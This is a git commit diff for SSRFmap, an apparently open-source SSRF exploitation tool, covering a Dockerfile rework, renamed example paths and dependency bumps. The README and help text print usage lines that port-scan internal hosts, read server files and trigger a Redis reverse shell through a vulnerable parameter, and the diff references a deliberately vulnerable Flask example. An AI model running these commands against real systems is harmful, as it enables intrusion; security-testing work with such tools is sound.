Dockerfile reworked + examples
parent
3eacb5d729
commit
7a04c5bb60
|
@ -104,3 +104,6 @@ venv.bak/
|
||||||
|
|
||||||
# mypy
|
# mypy
|
||||||
.mypy_cache/
|
.mypy_cache/
|
||||||
|
|
||||||
|
# artifacts
|
||||||
|
127.0.0.1_5000/
|
||||||
|
|
17
Dockerfile
17
Dockerfile
|
@ -1,9 +1,14 @@
|
||||||
FROM python:3-alpine3.10
|
FROM python:3.12.4-alpine
|
||||||
|
|
||||||
WORKDIR /opt
|
WORKDIR /usr/src/app
|
||||||
|
COPY . /usr/src/app
|
||||||
|
|
||||||
RUN apk update && apk add git
|
RUN apk update && apk add curl
|
||||||
RUN git clone https://github.com/swisskyrepo/SSRFmap.git
|
|
||||||
RUN cd /opt/SSRFmap && pip install -r requirements.txt
|
|
||||||
|
|
||||||
ENTRYPOINT ["python3","/opt/SSRFmap/ssrfmap.py"]
|
# Install requirements
|
||||||
|
RUN pip install -r requirements.txt
|
||||||
|
|
||||||
|
# Downgrade privileges
|
||||||
|
USER 1000
|
||||||
|
|
||||||
|
ENTRYPOINT ["python3"]
|
33
README.md
33
README.md
|
@ -45,8 +45,7 @@ The following modules are already implemented and can be used with the `-m` argu
|
||||||
|
|
||||||
## Install and Manual
|
## Install and Manual
|
||||||
|
|
||||||
Basic install from the Github repository.
|
* From the Github repository.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
$ git clone https://github.com/swisskyrepo/SSRFmap
|
$ git clone https://github.com/swisskyrepo/SSRFmap
|
||||||
$ cd SSRFmap/
|
$ cd SSRFmap/
|
||||||
|
@ -72,10 +71,19 @@ $ python3 ssrfmap.py
|
||||||
--level [LEVEL] Level of test to perform (1-5, default: 1)
|
--level [LEVEL] Level of test to perform (1-5, default: 1)
|
||||||
```
|
```
|
||||||
|
|
||||||
|
* Docker
|
||||||
|
```powershell
|
||||||
|
$ git clone https://github.com/swisskyrepo/SSRFmap
|
||||||
|
$ docker build --no-cache -t ssrfmap .
|
||||||
|
$ docker run -it ssrfmap ssrfmap.py [OPTIONS]
|
||||||
|
$ docker run -it -v $(pwd):/usr/src/app ssrfmap ssrfmap.py
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Examples
|
## Examples
|
||||||
|
|
||||||
First you need a request with a parameter to fuzz, Burp requests works well with SSRFmap.
|
First you need a request with a parameter to fuzz, Burp requests works well with SSRFmap.
|
||||||
They should look like the following. More examples are available in the **/data** folder.
|
They should look like the following. More examples are available in the **./examples** folder.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
POST /ssrf HTTP/1.1
|
POST /ssrf HTTP/1.1
|
||||||
|
@ -97,21 +105,21 @@ Use the `-m` followed by module name (separated by a `,` if you want to launch s
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# Launch a portscan on localhost and read default files
|
# Launch a portscan on localhost and read default files
|
||||||
python ssrfmap.py -r data/request.txt -p url -m readfiles,portscan
|
python ssrfmap.py -r examples/request.txt -p url -m readfiles,portscan
|
||||||
```
|
```
|
||||||
|
|
||||||
If you need to have a custom user-agent use the `--uagent`. Some targets will use HTTPS, you can enable it with `--ssl`.
|
If you need to have a custom user-agent use the `--uagent`. Some targets will use HTTPS, you can enable it with `--ssl`.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# Launch a portscan against an HTTPS endpoint using a custom user-agent
|
# Launch a portscan against an HTTPS endpoint using a custom user-agent
|
||||||
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
|
python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
|
||||||
```
|
```
|
||||||
|
|
||||||
Some modules allow you to create a connect back, you have to specify LHOST and LPORT. Also SSRFmap can listen for the incoming reverse shell.
|
Some modules allow you to create a connect back, you have to specify LHOST and LPORT. Also SSRFmap can listen for the incoming reverse shell.
|
||||||
|
|
||||||
```powershell
|
```powershell
|
||||||
# Triggering a reverse shell on a Redis
|
# Triggering a reverse shell on a Redis
|
||||||
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
|
python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
|
||||||
|
|
||||||
# -l create a listener for reverse shell on the specified port
|
# -l create a listener for reverse shell on the specified port
|
||||||
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
|
# --lhost and --lport work like in Metasploit, these values are used to create a reverse shell payload
|
||||||
|
@ -127,11 +135,20 @@ When the target is protected by a WAF or some filters you can try a wide range o
|
||||||
|
|
||||||
A quick way to test the framework can be done with `data/example.py` SSRF service.
|
A quick way to test the framework can be done with `data/example.py` SSRF service.
|
||||||
|
|
||||||
|
* Local
|
||||||
```powershell
|
```powershell
|
||||||
FLASK_APP=data/example.py flask run &
|
FLASK_APP=examples/example.py flask run &
|
||||||
python ssrfmap.py -r data/request.txt -p url -m readfiles
|
python ssrfmap.py -r examples/request.txt -p url -m readfiles
|
||||||
```
|
```
|
||||||
|
|
||||||
|
* Docker
|
||||||
|
```ps1
|
||||||
|
docker build --no-cache -t ssrfmap .
|
||||||
|
docker run -it -v $(pwd):/usr/src/app --name example ssrfmap examples/example.py
|
||||||
|
docker exec -it example python ssrfmap.py -r examples/request.txt -p url -m readfiles
|
||||||
|
```
|
||||||
|
|
||||||
|
|
||||||
## Contribute
|
## Contribute
|
||||||
|
|
||||||
I :heart: pull requests :)
|
I :heart: pull requests :)
|
||||||
|
|
|
@ -1,9 +1,8 @@
|
||||||
# NOTE: do not try this at home - highly vulnerable ! (SSRF and RCE)
|
# NOTE: Do not try this at home - highly vulnerable ! (SSRF and RCE)
|
||||||
# NOTE: this file should become a simple ssrf example in order to test SSRFmap
|
# NOTE: SSRF examples script
|
||||||
# FLASK_APP=example.py flask run
|
# FLASK_APP=example.py flask run
|
||||||
|
|
||||||
from flask import Flask, abort, request
|
from flask import Flask, request
|
||||||
import json
|
|
||||||
import re
|
import re
|
||||||
import subprocess
|
import subprocess
|
||||||
|
|
|
@ -1,2 +1,2 @@
|
||||||
Flask==2.3.2
|
Flask==3.0.3
|
||||||
requests==2.21.0
|
requests==2.31.0
|
||||||
|
|
10
ssrfmap.py
10
ssrfmap.py
|
@ -17,11 +17,11 @@ def display_banner():
|
||||||
|
|
||||||
def parse_args():
|
def parse_args():
|
||||||
example_text = '''Examples:
|
example_text = '''Examples:
|
||||||
python ssrfmap.py -r data/request2.txt -p url -m portscan
|
python ssrfmap.py -r examples/request2.txt -p url -m portscan
|
||||||
python ssrfmap.py -r data/request.txt -p url -m redis
|
python ssrfmap.py -r examples/request.txt -p url -m redis
|
||||||
python ssrfmap.py -r data/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
|
python ssrfmap.py -r examples/request.txt -p url -m portscan --ssl --uagent "SSRFmapAgent"
|
||||||
python ssrfmap.py -r data/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
|
python ssrfmap.py -r examples/request.txt -p url -m redis --lhost=127.0.0.1 --lport=4242 -l 4242
|
||||||
python ssrfmap.py -r data/request.txt -p url -m readfiles --rfiles
|
python ssrfmap.py -r examples/request.txt -p url -m readfiles --rfiles
|
||||||
'''
|
'''
|
||||||
parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
|
parser = argparse.ArgumentParser(epilog=example_text, formatter_class=argparse.RawDescriptionHelpFormatter)
|
||||||
parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")
|
parser.add_argument('-r', action ='store', dest='reqfile', help="SSRF Request file")
|
||||||
|
|
Loading…
Reference in New Issue